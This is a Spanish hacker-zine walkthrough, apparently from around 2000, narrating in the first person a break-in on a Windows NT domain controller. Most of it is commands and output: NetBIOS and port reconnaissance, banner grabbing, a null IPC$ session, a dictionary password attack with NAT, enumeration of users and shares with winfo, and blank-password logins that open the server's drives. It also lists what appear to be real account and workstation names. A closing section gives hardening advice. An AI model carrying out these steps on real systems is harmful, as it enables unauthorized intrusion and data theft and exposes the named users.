Copy Link
Add to Bookmark
Report
3x02 Hack sencillo en un Windows NT ... en 15 minutos ...
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
kSh kSh kSh kSh kSh kSh kSh
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
Hack sencillo en un Windows NT..... en 15 minutos .. (stp by stp)
by }}KOdeX{{
===================================================
La informacion que se presenta a continuacion es para propositos
didacticos solamente, de como un intruso pudo haber entrado en tu
sistema. En ningun momento asumo que entre a sistema alguno , Hablare
en 1ra persona para hacer el relato mas interesante ...
--------
Los comentarios agregados para mayor comprension empezaran con un " ## " .
Ojo a los comandos ;) .
Se han cambiado nombres y ip obviamente para proteger la integridad de esos sistemas..
Muchas otras formas de atake pudieron haberse implementado.. esta es tan solo algunas de ellas.
* antes..
saludos()
{
kerber0s
GigaBIT
husoft
mastercrack
otros++
}
end
Muy bien comencemos..
PROTAGONISTAS
==============
Atacante: }}KOdeX{{
target : 121.0.0.1(NAME)
Herramientas utilizadas
========================
ping
nbtstat
telnet
tracert
nbtstat
net
nat (utilidad externa .. net & nbtstat)
winfo (utilidad externa)
portscaner
un cerebro ;)
Propósito
==========
Investigación
curiosidad
Ayuda para un amigo (kerber0s)
Muy bien empezamos ....
C:\>ping 121.0.0.1 <--- ## chequeo si el host esta vivo
Pinging 121.0.0.1 with 32 bytes of data:
Reply from 121.0.0.1: bytes=32 time=751ms TTL=109
Reply from 121.0.0.1: bytes=32 time=661ms TTL=109
Reply from 121.0.0.1: bytes=32 time=631ms TTL=109
Reply from 121.0.0.1: bytes=32 time=761ms TTL=109
Ping statistics for 121.0.0.1: <---- ## parece que si... :P~
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 631ms, Maximum = 761ms, Average = 701ms
C:\>nbtstat -a 121.0.0.1 < ------# chequeo la tabla del NetBios
\Device\NetBT_Tcpip_{1BAC266D-F39A-4B9D-B504-AB4F94C4E480}:
Node IpAddress: [205.244.33.112] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
NAME <00> UNIQUE Registered <- ## ummm se llama NAME
NAME <20> UNIQUE Registered <- ## el 20 me dice que comparte recursos };)
GRUPO <00> GROUP Registered
GRUPO <1C> GROUP Registered <- ## es un Primary Domain Control (interesante)
GRUPO <1B> UNIQUE Registered
GRUPO <1E> GROUP Registered
NAME <03> UNIQUE Registered
NAME <01> UNIQUE Registered
GRUPO <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~NAME.... <00> UNIQUE Registered <- ## estos me dicen que tiene el IIS instalado
ADMINISTRATOR <03> UNIQUE Registered <- ## el ADMINISTRADOR esta logeado.
1...........K,S<A4> UNIQUE Registered
## Bueno hasta ahora la cosa va bien .. Sé que es un servidor y
aparte de estar conectado a internet es un servidor interno de archivos,
y un PDC (Primary Domain Controler).
## Vamos a ver los puertos que tiene abiertos este muchacho..
C:\scan 121.0.0.1
Scaning...
121.0.0.1 : 80 ( HTTP )
121.0.0.1 : 119 ( News )
121.0.0.1 : 135 ( Win nt )
121.0.0.1 : 110 ( POP3 )
121.0.0.1 : 21 ( FTP )
121.0.0.1 : 1042 ( )
121.0.0.1 : 1048 ( )
121.0.0.1 : 1052 ( )
121.0.0.1 : 1057 ( )
121.0.0.1 : 1068 ( )
121.0.0.1 : 1072 ( )
121.0.0.1 : 1089 ( )
121.0.0.1 : 1093 ( )
121.0.0.1 : 1073 ( )
121.0.0.1 : 1269 ( )
121.0.0.1 : 1310 ( )
121.0.0.1 : 1723 ( )
121.0.0.1 : 5044 ( )
121.0.0.1 : 5075 ( )
End scan
## ok que nos revela estos puertos ... Veamos ..
121.0.0.1 : 80 ( HTTP ) <-- ## Tiene un servidor web instalado IIS por supuesto :)
121.0.0.1 : 119 ( News ) <-- ## servidor de noticias...
121.0.0.1 : 135 ( Win nt ) <-- ## sin comentarios..
121.0.0.1 : 110 ( POP3 ) <-- ## correo
121.0.0.1 : 21 ( FTP ) <-- ## servidor de archivos..
121.0.0.1 : 1042 ( )---
121.0.0.1 : 1048 ( ) |
121.0.0.1 : 1052 ( ) |
121.0.0.1 : 1057 ( ) |
121.0.0.1 : 1068 ( ) |
121.0.0.1 : 1072 ( ) |<---## jeje
121.0.0.1 : 1089 ( ) |
121.0.0.1 : 1093 ( ) |
121.0.0.1 : 1073 ( ) |
121.0.0.1 : 1269 ( ) |
121.0.0.1 : 1310 ( ) |
121.0.0.1 : 1723 ( )__|
121.0.0.1 : 5044 ( )
121.0.0.1 : 5075 ( ) <-- ## ohh una utilidad de administración remota.. ummm!!
## ok veamos lo que podemos hacer con esto
C:\>FTP 121.0.0.1 <-- ## me conecto por ftp
Connected to 121.0.0.1.
220 NAME Microsoft FTP Service (Version 3.0).
User (121.0.0.1:(none)): anonymous <- ## probemos el usuario anonimo aver si esta activo.
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:tevoyahackear@kodeX.org
230 Anonymous user logged in. <-- ## yes !!!
ftp>dir <-- ## veamos si hay algo..
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete. < ##-- nada.. parece que no lo usan jeje.
ftp> send c:\prueba.txt <-- ## chequiemos los permisos de escritura ...
550 > Access is denied. <-- ## nada..que se va a hacer...
ftp>quit
---
## ok veamos el correo
C:\>telnet 121.0.0.1 110
+OK Microsoft Exchange POP3 server version 5.0.1460.9 ready <-# solo chequeo...
quit
Connection to host lost.
# Veamos la version del IIS (Servidor Web)
C:\>telnet 121.0.0.1 80
GET /
HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/4.0
Date: Sat, 01 Jan 2000 23:54:49 GMT
Content-Length: 3243
Content-Type: text/html <-- # Version del IIS (importante para otros atakes)
---
## veamos las news
C:\>telnet 121.0.0.1 119
201 Microsoft Exchange Internet News Service Version 5.0.1460.9 (no posting)
help <-- # el mejor comando del mundo .. jeje ;) .
100 legal commands < --# esto es lo que me tira
article [message-id|number]
authinfo [user|pass|generic|transact] <data>
body [message-id|number]
date
group newsgroup
head [message-id|number]
help
last
list [active|extensions|newsgroups|overview.fmt] <--## probemos este
listgroup [newsgroup]
mode reader
newgroups yymmdd hhmmss ["GMT"]
newnews newsgroups yymmdd hhmmss ["GMT"] [<distributions>]
next
over [range]
post
quit
stat [message-id|number]
xhdr header [range|message-id]
xmstnef [enable|disable]
xover [range]
.
list <-- # probando...
480 authentication required <-- # umm
quit <-- ## ahaa me voy...
------- ( me paro, me bebo un refresco, me como una papitas... )
ehh que yo necesito comer tambien :P~ ..
## Despues del surfeo de los puertos medito en la idea de los " recursos compartidos "...
## Muy bien veamos que hay ....(es NT mas estable en seguridad que
Windows 9x) pero es mas interesante... ;) .
# ok listos..
C:\>net view \\121.0.0.1 <-- ## chequeo los recursos compartidos...
System error 5 has occurred.
Access is denied. <-- ## cierto.. esto es NT y NT no permite la visualisacion de los
recursos hasta que alguien se logea en el dominio... :(
## y para logearse hay que tener una cuenta valida.... :(
## Umm pero.. micro$oft se las arregla para hacernos la vida facil
a nosotros y provee la "coneccion nula" ... Sin usuario , Sin
clave , Sin nada (fantastico)... =) .
C:\>net use \\121.0.0.1\ipc$ "" /user:"" <--## procedamos IPC$ (Inter-Process Comunication)
The command completed successfully.
C:\>net view \\121.0.0.1 <--## veamos ahora ...
Shared resources at \\121.0.0.1
Share name Type Used as Comment
-------------------------------------------------------------------------------
Add-ins Disk "Access to EDK objects"
Address Disk "Access to address objects"
AVUPDATE Disk
cdacer Disk
Clients Disk (UNC) Network Client Distribution Share
D Disk
E Disk
mspclnt Disk
NETLOGON Disk Logon server share
proxy Disk
RECYCLER Disk
Resources Disk "Event logging files"
Samples Disk "Exchange public folder sample apps"
tracking.log Disk "Exchange message tracking logs"
Updates Disk
UTILS Disk
xvs01 Disk
The command completed successfully.
C:\>dir \\121.0.0.1\add-ins <-- # ok probemos ...
Access is denied.
C:\>dir \\121.0.0.1\Address <-- # probemos de nuevo ...
Access is denied.
C:\>dir \\121.0.0.1\cdacer <- # sigamos probando ...
Access is denied.
C:\>dir \\121.0.0.1\AVUPDATE <-- # NOTA ... Este ataque solo funciona si el recurso esta sin
Access is denied. clave o pertenece al grupo " Everyone " y
si decimos Everyone hasta el usuario que se conecta en una
seccion nula pertece a ese grupo.
C:\>dir \\121.0.0.1\Clients <--# continuamos...
Access is denied.
C:\>dir \\121.0.0.1\mspclnt
Access is denied.
C:\>dir \\121.0.0.1\D
Access is denied.
C:\>dir \\121.0.0.1\E
Access is denied.
C:\>dir \\121.0.0.1\proxy
Access is denied.
C:\>dir \\121.0.0.1\resources
Access is denied.
...... < -- # para no cansar me volé algunos ... jeje
C:\>dir \\121.0.0.1\admin$
Access is denied.
C:\>dir \\121.0.0.1\root$
Access is denied.
## nada .... unm recurramos a NAT .. NetBios Administration Tool
C:\>nat 121.0.0.1 <-- # veamos ....
[*]--- Checking host: 121.0.0.1
[*]--- Obtaining list of remote NetBIOS names
[*]--- Remote systems name tables:
NAME
NAME
GRUPO
GRUPO
GRUPO
GRUPO
NAME
NAME
GRUPO
Got 1
Got 2
__MSBROWSE__Got 2
INet~Services
IS~NAME
ADMINISTRATOR
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: NAME
[*]--- CONNECTED with name: NAME
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Thu Apr 06 08:55:58 2000
[*]--- Timezone is UTC-4.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: NAME
[*]--- CONNECTED with name: NAME
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `' Password: `GUEST'
[*]--- Attempting to connect with Username: `' Password: `ROOT'
[*]--- Attempting to connect with Username: `' Password: `ADMIN'
[*]--- Attempting to connect with Username: `' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `' Password: `TEMP'
[*]--- Attempting to connect with Username: `' Password: `SHARE'
[*]--- Attempting to connect with Username: `' Password: `WRITE'
[*]--- Attempting to connect with Username: `' Password: `FULL'
[*]--- Attempting to connect with Username: `' Password: `BOTH'
[*]--- Attempting to connect with Username: `' Password: `READ'
[*]--- Attempting to connect with Username: `' Password: `FILES'
[*]--- Attempting to connect with Username: `' Password: `DEMO'
[*]--- Attempting to connect with Username: `' Password: `TEST'
[*]--- Attempting to connect with Username: `' Password: `ACCESS'
[*]--- Attempting to connect with Username: `' Password: `USER'
[*]--- Attempting to connect with Username: `' Password: `BACKUP'
[*]--- Attempting to connect with Username: `' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `' Password: `SERVER'
[*]--- Attempting to connect with Username: `' Password: `LOCAL'
[*]--- Attempting to connect with Username: `' Password: `NAME'
[*]--- Attempting to connect with Username: `' Password: `GRUPO'
[*]--- Attempting to connect with Username: `' Password: `Got 1
Got 2
__MSBROWSE__Got 2
'
[*]--- Attempting to connect with Username: `' Password: `INet~Services'
[*]--- Attempting to connect with Username: `' Password: `IS~NAME'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ADMINISTR
ATOR'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `GUEST'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ROOT'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ADMIN'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `TEMP'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `SHARE'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `WRITE'
........
........
......... <-- # y muchos password mas.. pero nada ...
## veamos los usuarios de esta makinita ... cosa que no se nos hara tampoco dificil.. ;) (winfo).
C:\winfo 121.0.0.1
USER ACCOUNTS:
* admcons
* admfin
* Administrator
(This account is the built-in administrator account)
* ADP01
* APF01
* ATR01
* AZR01
* BJD01
* BSR01
* burgosan
* CMH01
* CMPG
* DCC01
* DCN01
* DGD01
* DHM01
* DRC01
* ECA01
* ENR01
* ENV01
* EPS01
* EVS01
* FAG01
* FAM01
* FAM02
* FAR01
* FAR02
* FCAM01
* FCG01
* FEDP01
* FERNL
* FET01
* FJP01
* FKD01
* FLU01
* FMA01
* FMDM01
* FMH01
* FOR01
* FRM02
* FRSH01
* FYL01
* Guest
(This account is the built-in guest account)
* HMV01
* HRG01
* INGENIERIA
* IUSR_NAME
* JCR01
* JEF01
* JFA01
* JFA02
* JMS01
* LAD01
* LAF01
* LFG01
* LME01
* MAM01
* MAM02
* MBN01
* MCP01
* MHC01
* MJA01
* MMS01
* MMS02
* moraj
* MRP01
* MULLF
* NJR01
* NLS01
* NMC01
* ORC01
* PRP01
* RAA01
* RAL01
* RAM01
* RAS329
* RAV01
* remote
* RJR01
* RMM01
* ROD01
* RPH01
* S.CONFERENCIA
* SA
* SDL01
* SQLExecutiveCmdExec
* TMC01
* VGD01
* VMA01
* WDP01
* WMR01
* XVS01
* YAP01
* YPP01
* ZPR01
WORKSTATION TRUST ACCOUNTS:
* EMIL RAMIREZ$
* JMORA$
* MARTIN FELIZ$
* SERVCONS$
* SERVDELL$
* SERVEASY$
INTERDOMAIN TRUST ACCOUNTS:
SERVER TRUST ACCOUNTS:
* NAME$
* SERVHP$
SHARES:
* NETLOGON
* E
* Updates
* D
* ADMIN$
* IPC$
* maildat$
* proxy
* mspclnt
* C$
* Samples
* D$
* cdacer
* connect$
* xvs01
* Address
* Add-ins
* AVUPDATE
* tracking.log
* RECYCLER
* Resources
* Clients
* UTILS
## Ahora tenemos muuuuucha información de nuestro objetivo ..
## es probable que estés pensando en lo inseguros que estén muchos hosts por ahi.. ;) ...
## ok probemos algunos usuarios
C:\>net use G: \\121.0.0.1\c /user:admcons
The password or user name is invalid for \\121.0.0.1\c.
Type the password for \\121.0.0.1\c:
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
****
C:\>net use G: \\121.0.0.1\c /user:admfin
The password or user name is invalid for \\121.0.0.1\c.
Type the password for \\121.0.0.1\c:
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
**** ## probamos , probamos .... ( es bueno testiar los usernames
sin password.. muchas veces los usuarios no les ponen password a
sus usernames ... pasa mas veces de lo que te imaginas..)
C:\>net use G: \\121.0.0.1\d /user:administrator <-- ## jeje ;)
The password or user name is invalid for \\121.0.0.1\c.
Type the password for \\121.0.0.1\d:
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
..........
C:\>net use G: \\121.0.0.1\d /user:burgosan
The password or user name is invalid for \\121.0.0.1\d.
Type the password for \\121.0.0.1\d:
The command completed successfully. <--- # yesssssssssss ...........!!!!!!!! (acceso)
## y como veran la historia se escribio asi .......
C:\>dir \\121.0.0.1\d
Volume in drive \\121.0.0.1\d has no label.
Volume Serial Number is 90FA-034F
Directory of \\121.0.0.1\d
05/09/1998 10:27a <DIR> EXCHSRVR
05/04/2000 09:03p <DIR> Microsoft UAM Volume
07/04/1999 07:43a <DIR> TNGFW
07/01/2000 07:36a <DIR> Updates
14/01/2000 11:39a <DIR> urlcache
0 File(s) 0 bytes
5 Dir(s) 45,608,960 bytes free
C:\>dir \\121.0.0.1\e
Volume in drive \\121.0.0.1\e is FRx550_Plat
Volume Serial Number is 4DB1-BD8F
Directory of \\121.0.0.1\e
14/05/1999 03:54p <DIR> .
14/05/1999 03:54p <DIR> ..
02/10/1998 05:15p 289,447 _INST16.EX_
02/10/1998 05:15p 297,989 _INST32I.EX_
02/10/1998 04:05p 8,192 _ISDel.exe
14/05/1999 05:20p 1,326,543 _sys1.cab
14/05/1999 05:20p 8,025 _sys1.hdr
14/05/1999 05:20p 24,114 _user1.cab
14/05/1999 05:20p 8,659 _user1.hdr
14/05/1999 03:51p <DIR> Acrobat
31/08/1998 07:22a 159,744 AutoRun.exe
20/07/1998 06:28a 43 AUTORUN.INF
14/05/1999 05:20p 134 DATA.TAG
14/05/1999 05:24p 30,266,840 data1.cab
14/05/1999 05:24p 50,603 data1.hdr
15/01/1999 01:37p 10,089 DeIsL2.isu
05/11/1998 02:56p 8,943 DrillLic.txt
20/07/1998 07:28a 1,078 FRxCD.ico
05/11/1998 02:56p 8,943 FullLic.txt
14/05/1999 03:51p <DIR> Help
18/09/1998 01:12p 4,679 lang.dat
14/05/1999 05:24p 723 layout.bin
14/05/1999 03:51p <DIR> Odbc
27/07/1998 04:41p 450 os.dat
14/05/1999 03:51p <DIR> PROCS
14/05/1999 03:51p <DIR> scripts
05/11/1998 02:56p 8,943 ServLic.txt
14/05/1999 05:26p 184 setup.cfg
02/10/1998 04:04p 60,928 Setup.exe
14/05/1999 05:20p 105 SETUP.INI
13/05/1999 07:51a 156,480 setup.ins
14/05/1999 05:20p 82 setup.lid
14/05/1999 03:51p <DIR> setupdir
06/02/1998 09:37p 299,520 uninst.exe
26 File(s) 33,001,480 bytes
8 Dir(s) 0 bytes free
C:\>dir \\121.0.0.1\resources
Volume in drive \\121.0.0.1\resources has no label.
Volume Serial Number is 4358-1506
Directory of \\121.0.0.1\resources
04/09/1998 04:31p <DIR> .
04/09/1998 04:31p <DIR> ..
17/11/1996 11:38p 2,486,272 MTALOG.DLL
17/11/1996 11:38p 5,632 MTALOGCT.DLL
10/03/1997 10:00p 102,160 CCMSG.DLL
04/02/1998 10:00p 196,880 DSMSG.DLL
04/02/1998 10:00p 153,872 IMCMSG.DLL
04/02/1998 10:00p 451,856 MDBMSG.DLL
04/02/1998 10:00p 707,856 MTAMSG.DLL
10/03/1997 10:00p 76,560 NNTPEVT.DLL
10/03/1997 10:00p 32,016 POP3EVT.DLL
9 File(s) 4,213,104 bytes
2 Dir(s) 172,818,432 bytes free
C:\>dir \\121.0.0.1\utils
Volume in drive \\121.0.0.1\utils has no label.
Volume Serial Number is 4358-1506
Directory of \\121.0.0.1\utils
29/12/1999 01:05p <DIR> .
29/12/1999 01:05p <DIR> ..
29/12/1999 01:06p <DIR> LASTDAT
29/12/1999 01:06p <DIR> NETSHIELD
29/12/1999 01:06p <DIR> REMOTEADM
29/12/1999 01:08p <DIR> VSCAN
27/03/2000 07:03a <DIR> Importante <<--- ## ( interesante )
0 File(s) 0 bytes
7 Dir(s) 172,818,432 bytes free
## De ahi en adelante bueno ..... ya sabes a lo que cualquiera pudo haber hecho ..
## este material es con fines didacticos solamente y para enseñar
como un Intruso pudo haber entrado a tus sistemas .....
Solucion primaria a estos problemas :
======================================
1) Desactiva todos los servicios que no estés usando FTP,news,http, etc.
2) Crea una política de passwords para los usuarios, que les obligue
a usar passwors y cambiarlos cada cierto tiempo, ademas de que no
utilicen palabras faciles de adivinar : como el mismo nombre de
usuario el nombre real y que ademas use letras y numeros con un minimo de 7 caracteres.
3) Aunque el usar el PDC (Primary Domain Controler) para ser tambien
el proxy ahorra dinero (en primer instancia) , es una mejor idea
instalar un firewall que solo se dedique a eso y permita el buen
trafico entre la red interna y internet o otras conecciones externas,
protegiendo ademas datos valiosos que pudieran ser accedidos facilmente
desde el exterior. Ademas que no hemos tratado el caso de los ataques
DOS (ejemplo los nukes) .. cuaquiera puede atacar el server y dejar
fuera de servicio toda la red.. en nuestro ejemplo el servidor era un PDC .
4)Estar actualizado con los ultimos parches de nuestro sistemas.
5)Estar suscrito a una servicio de noticias de el sistema que usamos,
a fin de estar enterados de los xploits nuevos que salen a la luz
todos los dias y de los parches y soluciones que se pueden implementar.
6)No ser un idiota y hacer caso de todo lo que hemos dicho.. :P jeje ...
Bueno aburrr y harto en veno ..... :P~~ }}KOdeX{{
(Tiempo de hack 14:48 minutos)
" recuerda hackea un gameboy hoy el mundo despues... "
para mas informacion ..
http://www.l0pht.com/advisories.html
http://hispasec.com
http://securityfocus.com
http://rootshell.com
http://microsoft.com
http://come.to/kodex
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
kSh kSh kSh kSh kSh kSh kSh
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
